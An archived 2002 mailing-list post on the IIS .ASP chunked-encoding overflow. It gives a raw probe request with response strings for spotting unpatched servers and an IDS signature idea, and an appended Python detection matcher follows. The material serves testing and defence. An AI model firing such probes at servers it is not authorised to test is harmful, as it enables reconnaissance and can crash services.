Re: IIS .ASP Remote Buffer Overflow [testing for vulnerable installations]
From: Riley Hassell (rhassell@eeye.com) Date: 04/13/02
- Previous message: dullien@gmx.de: "Re[2]: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- In reply to: dullien@gmx.de: "Re[2]: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- Next in thread: 3APA3A: "Re[2]: IIS .ASP Remote Buffer Overflow [testing for vulnerable installations]"
- Next in thread: InterceptiX Security: "Re: Re[2]: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- Next in thread: incubus: "RE: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow"
- Reply: 3APA3A: "Re[2]: IIS .ASP Remote Buffer Overflow [testing for vulnerable installations]"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Riley Hassell" <rhassell@eeye.com> To: <vuln-dev@securityfocus.com> Date: Fri, 12 Apr 2002 15:15:47 -0700
If you want to test that an IIS4 or 5 server is vulnerable remotely you use
one of the following methods.
The request needs to be correct according to RFC.
Send this request:
"POST /iisstart.asp HTTP/1.1\r\n"
"Accept: */*\r\n"
"Host: eeye.com\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Transfer-Encoding: chunked\r\n"
"\r\n"
"1\r\n"
"E\r\n"
"0\r\n"
"\r\n"
"\r\n"
"\r\n"
It won't overwrite anything mission critical so the dllhost shouldn't lock
up or exit. If you're vulnerable then you'll see the following string in the
error message "(0x80004005)<br>Unspecified". When a server is patched it
will respond with a new error, I believe it's (0x80004005)<br>Request...
You can also try putting NULLs in strange places in your request. The rollup
fixes a problem in parsing requests with NULLs. When IIS sees something
invalid in a request it will error back with "parameter incorrect"; on an
unpatched system the responses will vary.
IDS Sig:
As far as an IDS signature, you guys can check for the existence of
"Content-Type: application/x-www-form-urlencoded\r\n" and
"Transfer-Encoding: chunked\r\n". These two tags can be switched around a
little so there has to be a certain level of logic available to the IDS.
Beyond that the chunking section can be changed around so it can't be used. The
default file isn't really a possibility, an attacker can scan a server
remotely for pages that have the necessary ASP tags ;)
Riley Hassell
Security Research Associate
eEye Digital Security
Get up...
and light the world on fire.
----- Original Message -----
From: <dullien@gmx.de>
To: "MadHat" <madhat@unspecific.com>
Cc: "Erik Parker" <eparker@mindsec.com>; "'Marc Maiffret'" <marc@eeye.com>;
"Vuln-Dev" <vuln-dev@securityfocus.com>
Sent: Friday, April 12, 2002 10:25 AM
Subject: Re[2]: Windows 2000 and NT4 IIS .ASP Remote Buffer Overflow
> Hey all,
>
> M> I have not been able to reproduce these results. I have managed to lock
> M> up IIS (IIS 5.0 with all patches pre Apr 1, 2002), but no popup messages
> M> appear and no entries in the Application Log. I have also been able to get
> M> the 100 Continue message (IIS 4.0 all patches pre Apr 1, 2002), but
> M> still no popup or messages.
>
> rule of thumb : It locks up <==> Heap is corrupted <==> vulnerable
>
> Cheers,
> dullien@gmx.de
>
> --
> Mit freundlichen Grüssen
> dullien@gmx.de mailto:dullien@gmx.de
>
>
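The IDS check Riley describes above, written out as an added example (not code from the post or from eEye): it parses the request head so the two headers match regardless of order or case, ignores the chunk body since the post says that part can be varied, and matches any .asp target rather than only the default page. The sample requests are constructed; the first is the probe request quoted in the post.

```python
from typing import Dict, List, Tuple

# Constructed samples. PROBE is the probe request quoted in the post above;
# SWAPPED reorders and re-cases the two headers the post says an IDS must
# tolerate; NORMAL is an ordinary form POST that must not match.
PROBE = (
    "POST /iisstart.asp HTTP/1.1\r\nAccept: */*\r\nHost: eeye.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Transfer-Encoding: chunked\r\n\r\n1\r\nE\r\n0\r\n\r\n"
)
SWAPPED = (
    "POST /login.ASP?x=1 HTTP/1.1\r\ntransfer-encoding: Chunked\r\n"
    "Host: example.test\r\n"
    "content-type: Application/X-WWW-Form-Urlencoded; charset=utf-8\r\n\r\n0\r\n\r\n"
)
NORMAL = (
    "POST /login.asp HTTP/1.1\r\nHost: example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 9\r\n\r\nuser=test"
)

def parse_request_head(raw: str) -> Tuple[str, str, Dict[str, List[str]]]:
    """Return (METHOD, target, headers); header names lower-cased, repeats kept
    as a list, so matching is independent of the order or case the client used."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    parts = lines[0].split()
    if len(parts) < 2:                      # malformed request line
        return "", "", {}
    headers: Dict[str, List[str]] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return parts[0].upper(), parts[1], headers

def is_chunked_asp_form_post(raw: str) -> bool:
    """Flag a chunked, form-urlencoded POST to any .asp target. Only the head is
    inspected: the post notes the chunk body can be varied, so no body pattern
    is used, and any .asp path counts since the probe needs no default page."""
    method, target, headers = parse_request_head(raw)
    path = target.split("?", 1)[0].lower()
    if method != "POST" or not path.endswith(".asp"):
        return False
    form = any(v.lower().startswith("application/x-www-form-urlencoded")
               for v in headers.get("content-type", []))
    chunked = any("chunked" in v.lower()
                  for v in headers.get("transfer-encoding", []))
    return form and chunked
```

Run the three constants through is_chunked_asp_form_post to see the first two flagged and the plain form POST pass; a production rule would additionally need to reassemble the request head across TCP segments before applying this logic.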